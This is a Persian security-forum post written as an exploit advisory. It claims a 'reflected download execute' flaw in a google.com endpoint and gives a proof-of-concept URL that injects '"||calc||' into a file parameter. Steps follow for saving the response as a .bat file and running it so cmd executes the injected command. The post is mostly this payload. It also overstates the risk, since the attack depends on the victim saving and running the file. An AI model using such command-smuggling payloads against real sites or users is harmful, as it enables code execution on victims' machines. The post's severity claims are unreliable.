رفتن به مطلب
انجمن تیم امنیتی گارد ایران

reflected download execute command google.com


Hoseinroot
 اشتراک گذاری

ارسال های توصیه شده

for first i show new bug in cyber world from google.com
# reflected download execute command google.com

# Risk: high

# Version: All

# Date: 11/11/2017

# Author: Hosein)root

# Tested on windows; Mozilla Firefox 54

# Vulnerable File: ?file=1

# Exploit:
[+] google.com/uds/?file=1&v=1&packages=geochart

# PoC:link
[+] google.com/uds/?file="||calc||&v=1&packages=geochart


2.input file= have vulnerability . first change ?file=1 to ?file=calc
#first test and load page now save page as a bat file now run bat file and see nothing

#second test we change ?file=1 to ?file=||calc|| and load page now save page as a bat file now run bat file and see nothing

#third test we change ?file=1 to ?file="||calc|| and load page now save page as a bat file now run bat file and see execute calculator with cmd
# by this message C:\Users\??\Desktop>var error = new Error("Module: '\" || calc || ' not found!");

#video
youtu.be/gOxt2Ip6sBo

# Thank's

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...